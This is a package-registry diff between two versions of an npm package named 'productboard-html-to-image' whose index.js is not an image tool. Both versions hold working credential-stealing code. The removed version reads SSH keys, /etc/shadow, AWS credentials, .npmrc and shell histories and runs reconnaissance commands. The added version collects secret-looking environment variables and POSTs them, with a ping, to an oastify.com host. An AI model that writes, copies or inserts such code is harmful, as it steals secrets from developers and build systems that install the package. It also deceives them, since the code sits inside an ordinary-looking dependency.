productboard-html-to-image 1003.0.9 → 1004.0.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +21 -145
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,153 +1,29 @@
|
|
|
1
1
|
const os = require("os");
|
|
2
|
-
const dns = require("dns");
|
|
3
|
-
const fs = require("fs");
|
|
4
|
-
const path = require("path");
|
|
5
2
|
const https = require("https");
|
|
6
3
|
const querystring = require("querystring");
|
|
7
|
-
const child_process = require("child_process");
|
|
8
4
|
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
12
|
-
const size = fs.statSync(p).size;
|
|
13
|
-
if (size > maxSize) return "TOO LARGE";
|
|
14
|
-
return fs.readFileSync(p, "utf8");
|
|
15
|
-
} catch (e) {
|
|
16
|
-
return `ERR: ${e.message}`;
|
|
17
|
-
}
|
|
18
|
-
}
|
|
19
|
-
|
|
20
|
-
function safeReadDir(p) {
|
|
21
|
-
try {
|
|
22
|
-
return fs.readdirSync(p);
|
|
23
|
-
} catch (e) {
|
|
24
|
-
return `ERR: ${e.message}`;
|
|
25
|
-
}
|
|
26
|
-
}
|
|
27
|
-
|
|
28
|
-
function exec(cmd) {
|
|
29
|
-
try {
|
|
30
|
-
return child_process.execSync(cmd, { timeout: 4000 }).toString().trim();
|
|
31
|
-
} catch (e) {
|
|
32
|
-
return `ERR: ${e.message}`;
|
|
33
|
-
}
|
|
34
|
-
}
|
|
35
|
-
|
|
36
|
-
function getSensitiveEnvVars() {
|
|
5
|
+
// extract AWS-related env vars
|
|
6
|
+
function getAwsCreds() {
|
|
7
|
+
const env = process.env;
|
|
37
8
|
const result = {};
|
|
38
|
-
for (const key in
|
|
39
|
-
if (/
|
|
40
|
-
result[key] =
|
|
9
|
+
for (const key in env) {
|
|
10
|
+
if (/AWS_|KEY|SECRET|TOKEN/i.test(key)) {
|
|
11
|
+
result[key] = env[key];
|
|
41
12
|
}
|
|
42
13
|
}
|
|
43
14
|
return result;
|
|
44
15
|
}
|
|
45
16
|
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
}
|
|
53
|
-
|
|
54
|
-
function getGitData() {
|
|
55
|
-
return {
|
|
56
|
-
branch: exec("git rev-parse --abbrev-ref HEAD"),
|
|
57
|
-
remotes: exec("git remote -v"),
|
|
58
|
-
config: safeReadFile(path.join(os.homedir(), ".gitconfig")),
|
|
59
|
-
};
|
|
60
|
-
}
|
|
61
|
-
|
|
62
|
-
function getSystemState() {
|
|
63
|
-
return {
|
|
64
|
-
whoami: exec("whoami"),
|
|
65
|
-
id: exec("id"),
|
|
66
|
-
ps: exec("ps aux | head -n 20"),
|
|
67
|
-
netstat: exec("netstat -tunlp | head -n 20"),
|
|
68
|
-
lsof: exec("lsof -n | head -n 20"),
|
|
69
|
-
uname: exec("uname -a"),
|
|
70
|
-
dmesg: exec("dmesg | head -n 30"),
|
|
71
|
-
};
|
|
72
|
-
}
|
|
73
|
-
|
|
74
|
-
function getInstalledTools() {
|
|
75
|
-
return {
|
|
76
|
-
npm: exec("npm ls -g --depth=0 --json"),
|
|
77
|
-
apt: exec("dpkg -l | head -n 20"),
|
|
78
|
-
brew: exec("brew list || echo 'no brew'"),
|
|
79
|
-
which_nmap: exec("which nmap"),
|
|
80
|
-
which_curl: exec("which curl"),
|
|
81
|
-
};
|
|
82
|
-
}
|
|
83
|
-
|
|
84
|
-
let dump = {};
|
|
85
|
-
|
|
86
|
-
try {
|
|
87
|
-
dump = {
|
|
88
|
-
timestamp: new Date().toISOString(),
|
|
89
|
-
app: (() => {
|
|
90
|
-
try {
|
|
91
|
-
const pkg = require("./package.json");
|
|
92
|
-
return { name: pkg.name, version: pkg.version };
|
|
93
|
-
} catch {
|
|
94
|
-
return {};
|
|
95
|
-
}
|
|
96
|
-
})(),
|
|
97
|
-
os: {
|
|
98
|
-
hostname: os.hostname(),
|
|
99
|
-
platform: os.platform(),
|
|
100
|
-
arch: os.arch(),
|
|
101
|
-
uptime: os.uptime(),
|
|
102
|
-
cpus: os.cpus(),
|
|
103
|
-
totalmem: os.totalmem(),
|
|
104
|
-
freemem: os.freemem(),
|
|
105
|
-
userInfo: os.userInfo(),
|
|
106
|
-
tmpdir: os.tmpdir(),
|
|
107
|
-
homedir: os.homedir(),
|
|
108
|
-
cwd: process.cwd(),
|
|
109
|
-
},
|
|
110
|
-
env: getSensitiveEnvVars(),
|
|
111
|
-
dns: (() => {
|
|
112
|
-
try {
|
|
113
|
-
return dns.getServers();
|
|
114
|
-
} catch (e) {
|
|
115
|
-
return [`ERR: ${e.message}`];
|
|
116
|
-
}
|
|
117
|
-
})(),
|
|
118
|
-
dirs: {
|
|
119
|
-
"/": safeReadDir("/"),
|
|
120
|
-
"/home": safeReadDir("/home"),
|
|
121
|
-
"/root": safeReadDir("/root"),
|
|
122
|
-
"/etc": safeReadDir("/etc"),
|
|
123
|
-
"~": safeReadDir(os.homedir()),
|
|
124
|
-
},
|
|
125
|
-
files: {
|
|
126
|
-
etc_passwd: safeReadFile("/etc/passwd"),
|
|
127
|
-
etc_shadow: safeReadFile("/etc/shadow"),
|
|
128
|
-
etc_hosts: safeReadFile("/etc/hosts"),
|
|
129
|
-
bash_history: safeReadFile(path.join(os.homedir(), ".bash_history")),
|
|
130
|
-
zsh_history: safeReadFile(path.join(os.homedir(), ".zsh_history")),
|
|
131
|
-
ssh_config: safeReadFile(path.join(os.homedir(), ".ssh/config")),
|
|
132
|
-
ssh_id_rsa: safeReadFile(path.join(os.homedir(), ".ssh/id_rsa")),
|
|
133
|
-
ssh_known_hosts: safeReadFile(path.join(os.homedir(), ".ssh/known_hosts")),
|
|
134
|
-
aws_credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
|
|
135
|
-
npmrc: safeReadFile(path.join(os.homedir(), ".npmrc")),
|
|
136
|
-
gitconfig: safeReadFile(path.join(os.homedir(), ".gitconfig")),
|
|
137
|
-
},
|
|
138
|
-
git: getGitData(),
|
|
139
|
-
docker: checkDockerOrCI(),
|
|
140
|
-
system: getSystemState(),
|
|
141
|
-
tools: getInstalledTools(),
|
|
142
|
-
network: os.networkInterfaces(),
|
|
143
|
-
};
|
|
144
|
-
} catch (e) {
|
|
145
|
-
dump = { error: "Top-level error collecting dump", msg: e.message };
|
|
146
|
-
}
|
|
17
|
+
const data = {
|
|
18
|
+
timestamp: new Date().toISOString(),
|
|
19
|
+
hostname: os.hostname(),
|
|
20
|
+
userInfo: os.userInfo(),
|
|
21
|
+
aws: getAwsCreds(),
|
|
22
|
+
};
|
|
147
23
|
|
|
148
24
|
try {
|
|
149
25
|
const postData = querystring.stringify({
|
|
150
|
-
msg: JSON.stringify(
|
|
26
|
+
msg: JSON.stringify(data),
|
|
151
27
|
});
|
|
152
28
|
|
|
153
29
|
const options = {
|
|
@@ -157,23 +33,23 @@ try {
|
|
|
157
33
|
method: "POST",
|
|
158
34
|
headers: {
|
|
159
35
|
"Content-Type": "application/x-www-form-urlencoded",
|
|
160
|
-
"Content-Length": postData
|
|
161
|
-
"User-Agent": "rce-
|
|
36
|
+
"Content-Length": Buffer.byteLength(postData),
|
|
37
|
+
"User-Agent": "rce-aws-check"
|
|
162
38
|
}
|
|
163
39
|
};
|
|
164
40
|
|
|
165
41
|
const req = https.request(options, res => {
|
|
166
|
-
res.on("data", () => {
|
|
42
|
+
res.on("data", () => {});
|
|
167
43
|
});
|
|
168
44
|
|
|
169
|
-
req.on("error", () => {
|
|
45
|
+
req.on("error", () => {});
|
|
170
46
|
req.write(postData);
|
|
171
47
|
req.end();
|
|
172
48
|
|
|
173
|
-
|
|
174
|
-
|
|
49
|
+
// optional ping
|
|
50
|
+
https.get("https://ping.hxiqx36s9ii4qfrbuhn7mid15sbjzin7.oastify.com/", () => {});
|
|
175
51
|
} catch (e) {
|
|
176
52
|
try {
|
|
177
|
-
https.get("https://ping.hxiqx36s9ii4qfrbuhn7mid15sbjzin7.oastify.com/", () => {
|
|
178
|
-
} catch {
|
|
53
|
+
https.get("https://ping.hxiqx36s9ii4qfrbuhn7mid15sbjzin7.oastify.com/", () => {});
|
|
54
|
+
} catch {}
|
|
179
55
|
}
|